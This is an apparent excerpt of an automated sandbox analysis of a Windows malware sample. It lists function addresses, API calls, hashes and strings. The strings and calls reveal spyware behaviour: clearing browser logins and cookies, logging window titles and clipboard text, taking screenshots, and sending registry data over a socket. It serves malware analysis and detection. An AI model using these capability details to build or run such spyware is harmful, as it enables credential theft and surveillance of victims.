                                                                                          • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                                          • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                                                                          • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                                          • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                                                                                          Function 0040C047 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          • Cleared browsers logins and cookies., xrefs: 0040C130
                                                                                          • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Sleep
                                                                                          • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                          • API String ID: 3472027048-1236744412
                                                                                          • Opcode ID: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                                                          • Instruction ID: 5a72b8a34604a64e244bad04561a930bad76f77e78bf22f3e088d6afb7384554
                                                                                          • Opcode Fuzzy Hash: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                                                          • Instruction Fuzzy Hash: A431A805648381EDD6116BF514967AB7B824A53748F0882BFB8C4373C3DA7A4808C79F
                                                                                          Function 004194FF Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • EnumDisplayMonitors.USER32(00000000,00000000,0041960A,00000000), ref: 00419530
                                                                                          • EnumDisplayDevicesW.USER32(?), ref: 00419560
                                                                                          • EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 004195D5
                                                                                          • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004195F2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DisplayEnum$Devices$Monitors
                                                                                          • String ID:
                                                                                          • API String ID: 1432082543-0
                                                                                          • Opcode ID: 307544a1efd678830df2dab17394228d9bd71c3d3133ae3f2bbfdbf915fafe35
                                                                                          • Instruction ID: 2d7c1ce958f8de7f9ce17d43b909e87ea7509c435c2805f0bc90a8abde121c81
                                                                                          • Opcode Fuzzy Hash: 307544a1efd678830df2dab17394228d9bd71c3d3133ae3f2bbfdbf915fafe35
                                                                                          • Instruction Fuzzy Hash: 232180721083146BD221DF26DC89EABBBECEBD1754F00053FF45AD3190EB749A49C66A
                                                                                          Function 0040A564 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0041C5E2: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C5F2
                                                                                            • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                                                                                            • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C625
                                                                                          • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                                                                          • Sleep.KERNEL32(00000064), ref: 0040A638
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Window$SleepText$ForegroundLength
                                                                                          • String ID: [ $ ]
                                                                                          • API String ID: 3309952895-93608704
                                                                                          • Opcode ID: e3c1de537be80067876ef70e6a789dfde08fa912f151d6d6ce86b7d0ea258fd3
                                                                                          • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                                                                                          • Opcode Fuzzy Hash: e3c1de537be80067876ef70e6a789dfde08fa912f151d6d6ce86b7d0ea258fd3
                                                                                          • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                                                                                          Function 0041B890 Relevance: 6.1, APIs: 4, Instructions: 63timesleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: SystemTimes$Sleep__aulldiv
                                                                                          • String ID:
                                                                                          • API String ID: 188215759-0
                                                                                          • Opcode ID: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                                                                                          • Instruction ID: 634937a4cd8d43e921f59083ecd148feda9109121ee8127270144c35be039893
                                                                                          • Opcode Fuzzy Hash: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                                                                                          • Instruction Fuzzy Hash: D01133B35043456BC304EAB5CD85DEF779CEBC4358F040A3EF64982061EE29E94986A6
                                                                                          Function 00443AD3 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                                                          • Instruction ID: 2af8e1c260e5220142bf0b5f8a7e988c949d9a3a1697e0ff4d6bcf25ce69da1b
                                                                                          • Opcode Fuzzy Hash: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                                                          • Instruction Fuzzy Hash: 7E01F2B26093557EFA202E786CC2F67630DCB51FBAB31033BB520612D2DB68DD40452C
                                                                                          Function 00443B52 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                                                          • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                                                                                          • Opcode Fuzzy Hash: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                                                          • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                                                                                          Function 0040A6B0 Relevance: 6.1, APIs: 4, Instructions: 58sleepfileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                                          • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$CloseCreateHandleSizeSleep
                                                                                          • String ID:
                                                                                          • API String ID: 1958988193-0
                                                                                          • Opcode ID: 3b1a01b47bddebb3752f31eb226f8e532d480515b9e880c3ec3420bf47c2c25d
                                                                                          • Instruction ID: fa029248b1ac628aedb802b18ed81a98d1a4018e107c0b234daa3009ae89debe
                                                                                          • Opcode Fuzzy Hash: 3b1a01b47bddebb3752f31eb226f8e532d480515b9e880c3ec3420bf47c2c25d
                                                                                          • Instruction Fuzzy Hash: 96110130600740AADA31A734988961F7BA9DB45356F44483EF1866B6D3C67DDC64C71F
                                                                                          Function 004485E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                                                                          • GetLastError.KERNEL32(?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                          • String ID:
                                                                                          • API String ID: 3177248105-0
                                                                                          • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                                                          • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                                                                          • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                                                          • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC
                                                                                          Function 0041C516 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C543
                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041C568
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0041C576
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$CloseCreateHandleReadSize
                                                                                          • String ID:
                                                                                          • API String ID: 3919263394-0
                                                                                          • Opcode ID: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                                                          • Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
                                                                                          • Opcode Fuzzy Hash: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                                                          • Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
                                                                                          Function 004398E3 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                                                                            • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                                                                          • _UnwindNestedFrames.LIBCMT ref: 00439911
                                                                                          • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                                                                          • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                          • String ID:
                                                                                          • API String ID: 2633735394-0
                                                                                          • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                          • Instruction ID: 1eef882e9718bbd9a0ab38cd68ce054dbb3f9d4064fa539f417e17899f1f7293
                                                                                          • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                          • Instruction Fuzzy Hash: 38010532000109BBCF125F56CC01EDA3BAAEF5C754F05901AF95865221C3BAE862ABA4
                                                                                          Function 0041941E Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetSystemMetrics.USER32(0000004C), ref: 0041942B
                                                                                          • GetSystemMetrics.USER32(0000004D), ref: 00419431
                                                                                          • GetSystemMetrics.USER32(0000004E), ref: 00419437
                                                                                          • GetSystemMetrics.USER32(0000004F), ref: 0041943D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: MetricsSystem
                                                                                          • String ID:
                                                                                          • API String ID: 4116985748-0
                                                                                          • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                          • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                                                                                          • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                          • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
                                                                                          Function 00438FB1 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                                                                          • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                                                                          • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                                                                            • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                                                                          • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                          • String ID:
                                                                                          • API String ID: 1761009282-0
                                                                                          • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                          • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                                                                                          • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                          • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                                                                                          Function 00442CAD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorHandling__start
                                                                                          • String ID: pow
                                                                                          • API String ID: 3213639722-2276729525
                                                                                          • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                                          • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                                                                                          • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                                          • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                                                                                          Function 00413D48 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D81
                                                                                            • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                                            • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                          • RegCloseKey.ADVAPI32(00000000,004660B4,004660B4,00466478,00466478,00000071), ref: 00413EEF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseEnumInfoOpenQuerysend
                                                                                          • String ID: NG
                                                                                          • API String ID: 3114080316-1651712548
                                                                                          • Opcode ID: a71d6f0dd6dcc93da5adf4ebdb912733ea44dcd57d8ae765127999729c86df5a
                                                                                          • Instruction ID: 39136fa66a1b3d14a29046baa0c8a2124f92290552efa608aac098e6c3039c27
                                                                                          • Opcode Fuzzy Hash: a71d6f0dd6dcc93da5adf4ebdb912733ea44dcd57d8ae765127999729c86df5a
                                                                                          • Instruction Fuzzy Hash: 03419F316042005AC324F726D852AEF76A99FD1384F40883FF549671D2EF7C5949866E
                                                                                          Function 0040404C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93sleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                                                            • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                                                                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                                                                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                                                          • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                                                                          Strings
                                                                                          • /sort "Visit Time" /stext ", xrefs: 004040B2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                          • String ID: /sort "Visit Time" /stext "
                                                                                          • API String ID: 368326130-1573945896
                                                                                          • Opcode ID: 38603f56d146c6edc1649b327761de0d025e6f1c59de35fee92e20854b51a343
                                                                                          • Instruction ID: 7a7c83aa22bf4ff3424ba87d95d637a61540eed1193ecfb54830ab602693969f
                                                                                          • Opcode Fuzzy Hash: 38603f56d146c6edc1649b327761de0d025e6f1c59de35fee92e20854b51a343
                                                                                          • Instruction Fuzzy Hash: 2C316371A0011956CB15FBA6DC569ED7375AF90308F00007FF60AB71E2EF785D49CA99
                                                                                          Function 00418ACD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418AF9
                                                                                            • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                                                                          • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B46
                                                                                            • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                                                            • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                          • String ID: image/jpeg
                                                                                          • API String ID: 1291196975-3785015651
                                                                                          • Opcode ID: 4c0baae4c0e9e9d16754b7ecd539cceb7e47a4de3878ce98d6afbfe1b810872b
                                                                                          • Instruction ID: 4d0b5c8bb5c89928ccad9adfa1773eea8e0f3015d74a4b244142dc53e7d0f70c
                                                                                          • Opcode Fuzzy Hash: 4c0baae4c0e9e9d16754b7ecd539cceb7e47a4de3878ce98d6afbfe1b810872b
                                                                                          • Instruction Fuzzy Hash: B5316D71604300AFC301EF65C884DAFBBE9EF8A304F00496EF985A7251DB7999048BA6
                                                                                          Function 0040B783 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                          • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Init_thread_footer__onexit
                                                                                          • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                                          • API String ID: 1881088180-3686566968
                                                                                          • Opcode ID: ff1494b0bb0d887acac5e8b0ebc29097e9756416d4b6e07dc10a2d628bf0c193
                                                                                          • Instruction ID: 844f446031992ee5170c212df839aebd4a436c67f2956c9e8fe8aff684c3a130
                                                                                          • Opcode Fuzzy Hash: ff1494b0bb0d887acac5e8b0ebc29097e9756416d4b6e07dc10a2d628bf0c193
                                                                                          • Instruction Fuzzy Hash: 30217131A102198ACB14FBA6D8929EDB375AF54318F10443FE505771D2EF786D4ACA8C
                                                                                          Function 00451BB7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetACP.KERNEL32(?,20001004,?,00000002), ref: 00451C92
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ACP$OCP
                                                                                          • API String ID: 0-711371036
                                                                                          • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                                          • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                                                                          • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                                          • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                                                                                          Function 0041631F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _wcslen.LIBCMT ref: 00416330
                                                                                            • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                            • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                                                            • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                                                            • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
